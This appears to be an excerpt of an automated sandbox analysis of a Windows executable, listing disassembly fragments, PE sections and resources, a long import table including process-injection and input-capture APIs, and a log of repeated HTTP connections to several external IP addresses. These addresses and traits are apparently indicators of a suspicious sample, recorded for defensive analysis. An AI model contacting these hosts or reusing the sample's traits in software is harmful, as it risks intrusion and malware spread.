lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F03A4D2FACDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F03A4D2FB18h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F03A4D2FB01h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x59a00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12e000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x59a00	0x59a00	46d997409972d8739e70ff07ae20cc5c	False	0.9292543802301255	data	7.8976710287144325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12e000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xd9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xda148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xda6dc	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc410	0x51068	data			1.0003344582379172
RT_GROUP_ICON	0x12d478	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x12d4f0	0x14	data	English	Great Britain	1.15
RT_VERSION	0x12d504	0x10c	data	English	Great Britain	0.5970149253731343
RT_MANIFEST	0x12d610	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 8, 2024 10:49:00.470808983 CEST	49710	80	192.168.2.10	154.215.72.110
May 8, 2024 10:49:00.793301105 CEST	80	49710	154.215.72.110	192.168.2.10
May 8, 2024 10:49:00.793433905 CEST	49710	80	192.168.2.10	154.215.72.110
May 8, 2024 10:49:00.795924902 CEST	49710	80	192.168.2.10	154.215.72.110
May 8, 2024 10:49:01.118930101 CEST	80	49710	154.215.72.110	192.168.2.10
May 8, 2024 10:49:01.118989944 CEST	80	49710	154.215.72.110	192.168.2.10
May 8, 2024 10:49:01.119009972 CEST	80	49710	154.215.72.110	192.168.2.10
May 8, 2024 10:49:01.119231939 CEST	49710	80	192.168.2.10	154.215.72.110
May 8, 2024 10:49:01.125859976 CEST	49710	80	192.168.2.10	154.215.72.110
May 8, 2024 10:49:01.128774881 CEST	80	49710	154.215.72.110	192.168.2.10
May 8, 2024 10:49:01.128851891 CEST	49710	80	192.168.2.10	154.215.72.110
May 8, 2024 10:49:01.329037905 CEST	80	49710	154.215.72.110	192.168.2.10
May 8, 2024 10:49:01.329102039 CEST	49710	80	192.168.2.10	154.215.72.110
May 8, 2024 10:49:01.448523998 CEST	80	49710	154.215.72.110	192.168.2.10
May 8, 2024 10:49:16.644279957 CEST	49711	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:16.934256077 CEST	80	49711	202.172.28.202	192.168.2.10
May 8, 2024 10:49:16.934325933 CEST	49711	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:16.936454058 CEST	49711	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:17.225975990 CEST	80	49711	202.172.28.202	192.168.2.10
May 8, 2024 10:49:17.237772942 CEST	80	49711	202.172.28.202	192.168.2.10
May 8, 2024 10:49:17.291136026 CEST	49711	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:18.042951107 CEST	80	49711	202.172.28.202	192.168.2.10
May 8, 2024 10:49:18.043006897 CEST	49711	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:18.447743893 CEST	49711	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:19.466247082 CEST	49712	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:19.756083965 CEST	80	49712	202.172.28.202	192.168.2.10
May 8, 2024 10:49:19.756433010 CEST	49712	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:19.758498907 CEST	49712	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:20.048201084 CEST	80	49712	202.172.28.202	192.168.2.10
May 8, 2024 10:49:20.048599958 CEST	80	49712	202.172.28.202	192.168.2.10
May 8, 2024 10:49:20.103626013 CEST	49712	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:20.858747959 CEST	80	49712	202.172.28.202	192.168.2.10
May 8, 2024 10:49:20.858844995 CEST	49712	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:21.260202885 CEST	49712	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:22.278947115 CEST	49713	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:22.566596031 CEST	80	49713	202.172.28.202	192.168.2.10
May 8, 2024 10:49:22.566776037 CEST	49713	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:22.568752050 CEST	49713	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:22.858525038 CEST	80	49713	202.172.28.202	192.168.2.10
May 8, 2024 10:49:22.858556032 CEST	80	49713	202.172.28.202	192.168.2.10
May 8, 2024 10:49:22.859085083 CEST	80	49713	202.172.28.202	192.168.2.10
May 8, 2024 10:49:22.900547028 CEST	49713	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:23.672296047 CEST	80	49713	202.172.28.202	192.168.2.10
May 8, 2024 10:49:23.672446966 CEST	49713	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:24.072470903 CEST	49713	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:25.091898918 CEST	49714	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:25.376408100 CEST	80	49714	202.172.28.202	192.168.2.10
May 8, 2024 10:49:25.376682043 CEST	49714	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:25.378590107 CEST	49714	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:25.663827896 CEST	80	49714	202.172.28.202	192.168.2.10
May 8, 2024 10:49:25.664339066 CEST	80	49714	202.172.28.202	192.168.2.10
May 8, 2024 10:49:25.664395094 CEST	80	49714	202.172.28.202	192.168.2.10
May 8, 2024 10:49:25.664582014 CEST	49714	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:25.667371035 CEST	49714	80	192.168.2.10	202.172.28.202
May 8, 2024 10:49:25.953424931 CEST	80	49714	202.172.28.202	192.168.2.10
May 8, 2024 10:49:31.251336098 CEST	49716	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:31.590007067 CEST	80	49716	116.50.37.244	192.168.2.10
May 8, 2024 10:49:31.590137959 CEST	49716	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:31.591990948 CEST	49716	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:31.934046984 CEST	80	49716	116.50.37.244	192.168.2.10
May 8, 2024 10:49:31.934181929 CEST	49716	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:33.104266882 CEST	49716	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:34.122440100 CEST	49717	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:34.459553957 CEST	80	49717	116.50.37.244	192.168.2.10
May 8, 2024 10:49:34.459687948 CEST	49717	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:34.677815914 CEST	49717	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:35.016516924 CEST	80	49717	116.50.37.244	192.168.2.10
May 8, 2024 10:49:35.016642094 CEST	49717	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:36.260507107 CEST	49717	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:37.278528929 CEST	49718	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:37.614696026 CEST	80	49718	116.50.37.244	192.168.2.10
May 8, 2024 10:49:37.616384983 CEST	49718	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:37.618297100 CEST	49718	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:37.955087900 CEST	80	49718	116.50.37.244	192.168.2.10
May 8, 2024 10:49:38.254314899 CEST	80	49718	116.50.37.244	192.168.2.10
May 8, 2024 10:49:38.256304979 CEST	49718	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:39.119410992 CEST	49718	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:40.137943029 CEST	49719	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:40.475804090 CEST	80	49719	116.50.37.244	192.168.2.10
May 8, 2024 10:49:40.476052046 CEST	49719	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:40.478224993 CEST	49719	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:40.817634106 CEST	80	49719	116.50.37.244	192.168.2.10
May 8, 2024 10:49:40.817837000 CEST	49719	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:40.820617914 CEST	49719	80	192.168.2.10	116.50.37.244
May 8, 2024 10:49:41.158217907 CEST	80	49719	116.50.37.244	192.168.2.10
May 8, 2024 10:49:46.305257082 CEST	49720	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:46.616662979 CEST	80	49720	46.30.213.191	192.168.2.10
May 8, 2024 10:49:46.616816044 CEST	49720	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:46.618686914 CEST	49720	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:46.930608034 CEST	80	49720	46.30.213.191	192.168.2.10
May 8, 2024 10:49:46.931341887 CEST	80	49720	46.30.213.191	192.168.2.10
May 8, 2024 10:49:46.931351900 CEST	80	49720	46.30.213.191	192.168.2.10
May 8, 2024 10:49:46.931430101 CEST	49720	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:48.135559082 CEST	49720	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:49.153661013 CEST	49721	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:49.464071989 CEST	80	49721	46.30.213.191	192.168.2.10
May 8, 2024 10:49:49.464200020 CEST	49721	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:49.466044903 CEST	49721	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:49.776488066 CEST	80	49721	46.30.213.191	192.168.2.10
May 8, 2024 10:49:49.777137041 CEST	80	49721	46.30.213.191	192.168.2.10
May 8, 2024 10:49:49.777148962 CEST	80	49721	46.30.213.191	192.168.2.10
May 8, 2024 10:49:49.777240992 CEST	49721	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:50.978800058 CEST	49721	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:51.997698069 CEST	49722	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:52.308908939 CEST	80	49722	46.30.213.191	192.168.2.10
May 8, 2024 10:49:52.308996916 CEST	49722	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:52.310908079 CEST	49722	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:52.621762991 CEST	80	49722	46.30.213.191	192.168.2.10
May 8, 2024 10:49:52.621793032 CEST	80	49722	46.30.213.191	192.168.2.10
May 8, 2024 10:49:52.622256994 CEST	80	49722	46.30.213.191	192.168.2.10
May 8, 2024 10:49:52.622266054 CEST	80	49722	46.30.213.191	192.168.2.10
May 8, 2024 10:49:52.622333050 CEST	49722	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:53.822755098 CEST	49722	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:54.848942041 CEST	49723	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:55.159887075 CEST	80	49723	46.30.213.191	192.168.2.10
May 8, 2024 10:49:55.160068035 CEST	49723	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:55.162235975 CEST	49723	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:55.473105907 CEST	80	49723	46.30.213.191	192.168.2.10
May 8, 2024 10:49:55.473931074 CEST	80	49723	46.30.213.191	192.168.2.10
May 8, 2024 10:49:55.473942041 CEST	80	49723	46.30.213.191	192.168.2.10
May 8, 2024 10:49:55.474073887 CEST	49723	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:55.476677895 CEST	49723	80	192.168.2.10	46.30.213.191
May 8, 2024 10:49:55.787475109 CEST	80	49723	46.30.213.191	192.168.2.10
May 8, 2024 10:50:01.359808922 CEST	49724	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:01.719945908 CEST	80	49724	85.159.66.93	192.168.2.10
May 8, 2024 10:50:01.720027924 CEST	49724	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:01.722522974 CEST	49724	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:02.084680080 CEST	80	49724	85.159.66.93	192.168.2.10
May 8, 2024 10:50:02.122688055 CEST	80	49724	85.159.66.93	192.168.2.10
May 8, 2024 10:50:02.122792959 CEST	49724	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:03.228777885 CEST	49724	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:04.247895002 CEST	49725	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:04.600018024 CEST	80	49725	85.159.66.93	192.168.2.10
May 8, 2024 10:50:04.603844881 CEST	49725	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:04.607462883 CEST	49725	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:04.959580898 CEST	80	49725	85.159.66.93	192.168.2.10
May 8, 2024 10:50:04.999367952 CEST	80	49725	85.159.66.93	192.168.2.10
May 8, 2024 10:50:04.999511957 CEST	49725	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:06.119426012 CEST	49725	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:07.319278955 CEST	49726	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:07.676358938 CEST	80	49726	85.159.66.93	192.168.2.10
May 8, 2024 10:50:07.676534891 CEST	49726	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:08.829221964 CEST	49726	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:09.185043097 CEST	80	49726	85.159.66.93	192.168.2.10
May 8, 2024 10:50:09.222603083 CEST	80	49726	85.159.66.93	192.168.2.10
May 8, 2024 10:50:09.224093914 CEST	80	49726	85.159.66.93	192.168.2.10
May 8, 2024 10:50:09.224172115 CEST	49726	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:10.339452982 CEST	49726	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:11.357239008 CEST	49727	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:11.717339993 CEST	80	49727	85.159.66.93	192.168.2.10
May 8, 2024 10:50:11.717546940 CEST	49727	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:11.721383095 CEST	49727	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:12.084863901 CEST	80	49727	85.159.66.93	192.168.2.10
May 8, 2024 10:50:12.085431099 CEST	49727	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:12.089317083 CEST	49727	80	192.168.2.10	85.159.66.93
May 8, 2024 10:50:12.450345039 CEST	80	49727	85.159.66.93	192.168.2.10
May 8, 2024 10:50:17.276432037 CEST	49728	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:17.588618994 CEST	80	49728	91.195.240.94	192.168.2.10
May 8, 2024 10:50:17.589535952 CEST	49728	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:17.592354059 CEST	49728	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:17.907753944 CEST	80	49728	91.195.240.94	192.168.2.10
May 8, 2024 10:50:17.907779932 CEST	80	49728	91.195.240.94	192.168.2.10
May 8, 2024 10:50:17.908797979 CEST	49728	80	192.168.2.10	91.195.240.94
May 8, 2024 10:50:19.103794098 CEST	49728	80	192.168.2.10	91.195.240.94
